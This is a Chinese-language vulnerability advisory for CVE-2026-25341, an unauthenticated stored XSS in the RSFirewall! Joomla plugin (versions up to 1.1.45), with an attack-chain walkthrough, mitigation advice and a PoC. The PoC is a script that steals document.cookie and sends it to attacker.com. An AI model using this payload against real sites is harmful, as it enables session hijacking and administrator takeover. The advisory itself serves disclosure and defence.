CVE-2026-25341 CVSS 7.1 高危

CVE-2026-25341 RSFirewall存储型XSS漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-25341

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

RSJoomla! RSFirewall!

漏洞概述

RSJoomla! RSFirewall插件在1.1.45及之前的版本中存在严重的存储型跨站脚本（XSS）漏洞。该漏洞源于插件在处理用户输入并进行网页生成时，未能正确中和特殊字符，导致攻击者可以注入恶意脚本。由于是存储型漏洞，恶意代码会被持久化保存在服务器数据库中。当具有权限的用户（如管理员）访问受影响的页面时，恶意脚本将在其浏览器上下文中执行。此漏洞的CVSS v3.1评分为7.1，严重等级为高危。攻击者利用此漏洞可窃取用户会话Cookie、篡改网页内容或重定向用户，从而对网站的机密性、完整性和可用性造成威胁。

技术细节

该漏洞的根本原因在于RSFirewall!插件对输入数据的过滤机制存在缺陷。攻击者无需预先认证（PR:N）即可向系统提交包含恶意JavaScript代码的数据。这可能发生在日志记录、防火墙规则配置或公共交互接口等数据输入点。由于应用程序未对这些数据进行适当的HTML实体编码或上下文感知的转义，当数据被重新渲染到Web页面时，浏览器将其解析为可执行的脚本代码。攻击链通常包括：攻击者发送特制的HTTP请求将Payload写入数据库；系统保存数据；管理员或其他用户浏览受影响的页面；浏览器加载并执行恶意脚本。利用成功后，攻击者可以接管管理员会话，进而在服务器上执行进一步的操作，如安装后门或上传Webshell。

攻击链分析

STEP 1

1. 侦察与准备

攻击者识别目标站点使用的是存在漏洞的RSFirewall!插件版本（<= 1.1.45），并构造包含恶意JavaScript的XSS Payload。

STEP 2

2. 注入Payload

攻击者无需登录，通过发送特制的HTTP请求（如带有恶意User-Agent的访问请求或提交表单），将Payload发送至服务器。

STEP 3

3. 数据存储

由于缺乏输入过滤，服务器将恶意数据存储在数据库中（例如存储在防火墙日志或配置项中）。

STEP 4

4. 触发漏洞

当管理员或授权用户访问后台查看日志或受影响的页面时，服务器从数据库读取恶意数据并渲染到HTML页面中。

STEP 5

5. 执行攻击

受害者的浏览器解析并执行恶意脚本，攻击者从而窃取Session ID或执行其他恶意操作，接管管理员权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for Stored XSS in RSFirewall -->
<!-- Inject this payload into a vulnerable field (e.g., User-Agent, Log comment) -->
<script>
  // Malicious JavaScript to steal session cookies
  var c = document.cookie;
  // Send stolen data to attacker's server
  var img = new Image();
  img.src = "http://attacker.com/steal?c=" + encodeURIComponent(c);
  // Demonstrate execution
  alert('XSS Executed: ' + c);
</script>

影响范围

RSFirewall! <= 1.1.45

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用RSFirewall!插件的非核心功能，特别是涉及日志查看和公共提交的功能。管理员应避免点击来源不明的链接，并在访问后台时使用无痕浏览器模式以降低Cookie被窃取的风险。同时，应检查系统日志中是否存在异常的脚本注入记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表